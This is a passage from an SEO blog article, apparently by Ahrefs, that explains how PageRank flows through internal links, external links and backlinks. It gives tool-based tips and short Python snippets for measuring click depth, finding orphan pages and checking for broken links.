Bill Slawski lists some other features that Google may use to evaluate the importance of a link in his analysis here.

2. Do internal links transfer PageRank in the same way as external links?

Google’s reasonable surfer patent gives some indication that internal and external links may be weighted differently.

Bill Slawski also talks about this in his analysis of the patent.

However, there is no definitive answer to this question. Just because it exists in a Google patent doesn’t mean that it’s part of the live algorithm. Google has filed a lot of patents over the years.

3. Does the first link from a site transfer more value than any subsequent links from the same site?

Bill Slawski states that subsequent links from the same site “might possibly be ignored when scores for pages are calculated.”

We also found a clear positive correlation between the number of unique referring domains and organic traffic when we analysed nearly 1 BILLION webpages.

[Chart: referring domains vs. organic search traffic, from our study of nearly 1 billion webpages]

4. …

Honestly, we could list unknowns like this all day. (If you’re interested, this article from Moz talks about more reasons why all links may not be created equal.)

Should you use URL Rating (UR) as a PageRank alternative?

URL Rating (UR) is a decent replacement metric for PageRank because it has a lot in common with the original PageRank formula.

However, it’s not a panacea. We know for a fact that URL Rating (UR) doesn’t take into account as many factors as the modern‐day iteration of Google PageRank.

So, our advice is to use it, but not to rely on it entirely. Always review link targets manually (that means visiting the actual page) before pursuing a link.

How to preserve (and boost) your PageRank

Before I start with this section, I want to stress an important point:

This is not about optimizing for PageRank or URL Rating (UR). That way of thinking often leads to poor decision making. The real task is to make sure that you’re not losing or wasting PageRank on your site.

For that, there are three areas to focus on:

  1. Internal links: How you link the pages together on your website affects the flow of “authority” or “link juice” around your site.
  2. External links: Both URL Rating (UR) and PageRank effectively share authority between all outbound links on a page. But this doesn’t mean you should delete or “nofollow” external links. (Keep reading.)
  3. Backlinks: Backlinks bring so‐called “link juice” into your site, which you should carefully preserve.

Let’s look at each of these individually.

Internal linking

Backlinks aren’t always within your control. People can link to any page on your site they choose, and they can use whatever anchor text they like.

But internal links are different. You have full control over them.

Seriously: Internal linking is a topic large enough to warrant an article of its own (let us know if you want us to write this!), but here are a few internal linking best practices to get you started:

1. Keep important content as close to your homepage as possible

Your homepage is almost certainly the strongest page on your site.

Don’t believe me? Do this:

Site Explorer > enter your domain > Best by Links

[Screenshot: the Best by Links report]

I’ll bet that your homepage is at the top of the list.

This is almost always the case for two reasons:

  1. Most backlinks will point to your homepage: Just look at the referring domains column on that report. You’ll most likely see that the number of links to your homepage is the highest of all pages on your site.
  2. Most sites link back to their homepage from all other pages: See the Ahrefs logo in the top left‐hand corner of this page? It links to our homepage. And it exists on all pages on our site. Most sites have a similar structure.

So the closer a page is to your homepage (in terms of the internal linking structure), the more “authority” it will receive. That’s why it pays to place important content as close to the homepage as possible.

You can find out how far away from the homepage a particular page is by running a site crawl in our Site Audit tool. Learn how to do that in this video.

https://www.youtube.com/watch?v=G_9-AkZch4k

Once you’ve done that, go to:

Site Audit > select project > select crawl > Data Explorer

[Screenshot: the Depth column in Site Audit’s Data Explorer]

Look at the “Depth” column, which tells you how many clicks away each page is from the homepage (assuming that’s where you started your crawl).

You can even sort the “Depth” column in descending order to see pages that are super far away from the homepage.
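If you’d rather compute click depth yourself, it’s just a breadth-first search over your internal link graph. Here’s a sketch, assuming you’ve already extracted page-to-page internal links from a crawl (the URLs below are invented):

```python
from collections import deque

# internal_links[url] = internal URLs that `url` links to
internal_links = {
    "/": ["/blog", "/pricing"],
    "/blog": ["/blog/pagerank", "/blog/seo-tips"],
    "/pricing": [],
    "/blog/pagerank": ["/blog/seo-tips"],
    "/blog/seo-tips": [],
}

# Breadth-first search from the homepage: each page's depth is the
# minimum number of clicks needed to reach it.
depth = {"/": 0}
queue = deque(["/"])
while queue:
    page = queue.popleft()
    for target in internal_links.get(page, []):
        if target not in depth:  # first time we reach it = shortest path
            depth[target] = depth[page] + 1
            queue.append(target)

print(depth)
# {'/': 0, '/blog': 1, '/pricing': 1, '/blog/pagerank': 2, '/blog/seo-tips': 2}
```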

But let’s face it, you can’t link to every page from your homepage, right?

The good news is that your homepage is not the only high‐value page on a site capable of transferring authority to other pages. If you’re desperate to send more “link juice” to a specific page on your site, do this:

  1. Use the Best by Links report to find the most high‐authority pages on your site;
  2. Link to the page you’re trying to ‘boost’ from any relevant high‐UR pages.

For example, looking at the Best by Links report for the Ahrefs blog, I see that our list of SEO tips has a high UR.

[Screenshot: our list of SEO tips in the Best by Links report]

I also know that we mention PageRank in this article…

[Screenshot: a mention of PageRank in our SEO tips article]

… so this is an entirely relevant, high‐UR page from which we could link to this very page.

Editor’s note

Here’s a quick trick for finding the most relevant high‐UR pages from which to add internal links to newly‐published blog posts.

Go to Google and use the following search operator:

site:yourdomain.com “topic of the page we want to link to internally”

For example, if we wanted to find internal link opportunities for this page, we could search:

site:ahrefs.com/blog “pagerank”

This unveils all our blog posts that mention the word “PageRank,” of which there are 22.

[Screenshot: Google results for site:ahrefs.com/blog “pagerank”]

But which of these pages would give the most powerful internal links?

Let’s use Chris Ainsworth’s SERP scraper to scrape the results, then paste them into Ahrefs’ Batch Analysis tool and sort by URL Rating (UR).

[Screenshot: the scraped results sorted by URL Rating in Ahrefs’ Batch Analysis tool]

Cool. Now we have a list of the most authoritative pages that mention the word “PageRank.” We can add internal links to this guide from a few of these pages, like so:


Internal link to this post from our list of SEO tips.

Joshua Hardwick

2. Fix “orphan” pages

PageRank flows through a site via internal and external links, which means that “link juice” can only reach a page if that page is actually linked to from one or more pages on the site.

If a page doesn’t have any inlinks, it’s referred to as an orphan page.

To find such pages, you first need a list of all the web pages on your site. Doing this can be a little tricky, but extracting the pages from your sitemap will often do the trick. You may also be able to download a full list of web pages generated by your CMS.

Once you have that, crawl your website in Ahrefs’ Site Audit tool, then go to:

Site Audit > Data Explorer > Is valid (200) internal HTML page = Yes

[Screenshot: the “Is valid (200) internal HTML page” filter in Site Audit’s Data Explorer]

Export this report, which will contain all the URLs found on your site during the crawl.

Now, compare the URLs in this report with the full list of pages on your site. Any pages that the crawl did not uncover are most likely orphan pages.

You should fix such pages by either removing them (if they’re unimportant) or adding internal links to them (if they are important).
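Conceptually, the comparison is just a set difference: the pages you know exist, minus the pages the crawler could reach. Here’s a sketch, assuming you’ve exported both lists as plain-text files with one URL per line (the filenames are made up):

```python
def load_urls(path):
    """Read a plain-text file with one URL per line into a set."""
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

# all_pages.txt: every page you know about (sitemap, CMS export, ...)
# crawled_pages.txt: every page the site crawl actually reached
all_pages = load_urls("all_pages.txt")
crawled_pages = load_urls("crawled_pages.txt")

orphans = all_pages - crawled_pages
for url in sorted(orphans):
    print(url)  # candidates to either remove or link to internally
```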

External linking

Many people feel that linking out to external resources (i.e., web pages on other sites) will somehow hurt their rankings.

That is not true. External links won’t hurt you, so you should not be worried about linking to other sites. We regularly link out to useful resources from the Ahrefs Blog, and our traffic is consistently rising.

[Chart: organic traffic to the Ahrefs Blog]

It is true that the more links you have on a page, the less “value” each link will transfer. But we’re pretty sure that in 2018, calculating the value of each link on a page is not as straightforward as it was back in the late 1990s, when the original PageRank patent was filed.

So, while you can hoard links and not link out to anyone, that doesn’t mean that Google will reward you for doing so. Not linking out to any external resources whatsoever looks seriously fishy and manipulative for a start, and we know Google doesn’t respect that kind of practice.

Bottom line? External links exist because they serve a purpose; they point readers to resources that add to the conversation. You should, therefore, link out whenever it is helpful to do so.

Here are a few external linking best practices to follow:

1. Don’t “nofollow” external links unless you need to

Here’s what Google says about “nofollow” links:

In general, we don’t follow them. This means that Google does not transfer PageRank or anchor text across these links.

Some websites (Forbes, HuffPo, etc.) now “nofollow” all of their external links by default.

Is this good practice? Not at all.

Most of these websites implemented that editorial policy because some of their writers were secretly selling links from their articles. Rather than try to police every writer, they imposed a blanket ban on “dofollow” external links.

But chances are you don’t have this problem. Hopefully, you run a quality website and carefully vet any guest submissions. In which case, there’s no need to “nofollow” all your external links. It just doesn’t make sense to do so.

So, you should only “nofollow” external links when:

  • Linking out to questionable pages: In this case, you might want to question whether you should be linking to that resource at all;
  • Linking out from a “sponsored post”: Sponsored posts are paid for, which means that any links within the post are effectively paid links. This is exactly what the “nofollow” attribute is for.

2. Fix broken external links

Broken external links contribute to a bad user experience. Here’s what happens when a reader clicks such a link:

[Screenshot: what a reader sees after clicking a dead link]

These links also ‘waste’ PageRank.

Think about it: The link has no value to anyone, yet it dilutes the value of the rest of the links on that page.

How do you fix these? You first need to find them.

Read this post to learn everything you need to know: How to Find and Fix Broken Links (to Reclaim Valuable “Link Juice”)
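That post covers the full workflow, but if you want a quick first pass yourself, a sketch like the one below (using Python’s `requests` library, with invented URLs) flags outbound links that no longer resolve:

```python
import requests

# Hypothetical list of outbound links extracted from your pages.
outbound_links = [
    "https://example.com/live-resource",
    "https://example.com/deleted-resource",
]

for url in outbound_links:
    try:
        # HEAD is cheaper than GET; some servers reject it, in which
        # case you'd fall back to a GET request.
        response = requests.head(url, allow_redirects=True, timeout=10)
        status = response.status_code
    except requests.RequestException:
        status = None  # DNS failure, timeout, connection refused, ...
    if status is None or status >= 400:
        print(f"BROKEN ({status}): {url}")
```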

Backlinks

Backlinks boost the PageRank of the linked‐to page. For example, backlinko.com links to our on‐page SEO guide and thus increases its PR.

But as discussed earlier, not all backlinks are created equal. Google looks at hundreds of factors to determine the real value of a backlink.

That said, here are a few useful hacks to get the most out of your backlinks:

1. Focus on building links from high‐UR pages

PageRank flows between pages, not domains.

A link from a high‐authority page on a low‐authority website will be worth more than a link from a low‐authority page on a high‐authority website.


So when vetting link prospects in Site Explorer, we recommend sorting by URL Rating (UR):

[Screenshot: sorting link prospects by URL Rating in Site Explorer]

If you found your prospects elsewhere (e.g., via a Google scrape), it’s worth pasting them into our Batch Analysis tool to check the URL Rating of each page.

Sidenote.

You can use a tool like URL Profiler to pull URL Rating (and other Ahrefs metrics) for thousands of pages in one go.

2. Fix broken pages that waste “link juice”

Backlinks don’t just boost the “authority” of the page they point to; they also boost every page that page links to, because PageRank flows from page to page via internal links.

But if you have backlinks pointing to a broken page, any “link juice” is effectively wasted because it has nowhere to flow from there.

You should, therefore, fix any broken pages with backlinks pointing to them. You can find such pages by adding a “404 not found” filter to the Best by links report.

Site Explorer > enter your domain > Best by links > add a 404 filter

[Screenshot: broken pages with backlinks, via the Best by links report]

This shows you all the broken pages on your site, plus the number of links they each have.

Learn more about finding and fixing these issues here.

3. Don’t get blinded by “authority”; context matters too

PageRank is important, but so is the context of a link.

What do I mean by this? Imagine that you run a cat blog, and you write a blog post about how your cat has scratched the seats of your beautiful new BMW. In the post, you link to a relevant product page on the official BMW website. Is this link irrelevant because it comes from a cat blog?

No. It’s still perfectly legit and relevant. However, it may have less “value” in the eyes of Google than a link from a well‐known auto blogger, who wrote an entire article about that particular BMW model.

In all honesty, if I had to choose which of these two pages would provide the best link for BMW

[Mockup: a link to BMW from a well‐known auto blog]

[Mockup: a link to BMW from a cat blog]

… I would have a seriously hard time deciding.

Sidenote.

These two pages aren’t real. I made them up. 🙂

Final thoughts

Most SEOs never think about Google PageRank for obvious reasons: it’s old, and there’s no way to see the PageRank for a page anymore, even if you wanted to.

But it’s important to remember that the PageRank formula is at the heart of many of today’s SEO best practices. It’s the reason why backlinks matter, and it’s why SEO professionals still pay so much attention to internal linking.

That’s not to say that you should obsess over, or even try to optimize for, PageRank directly. You shouldn’t. But understand that whenever you build links, work on your internal linking structure, or vet your external links, what you’re actually doing is indirectly optimizing for PageRank.
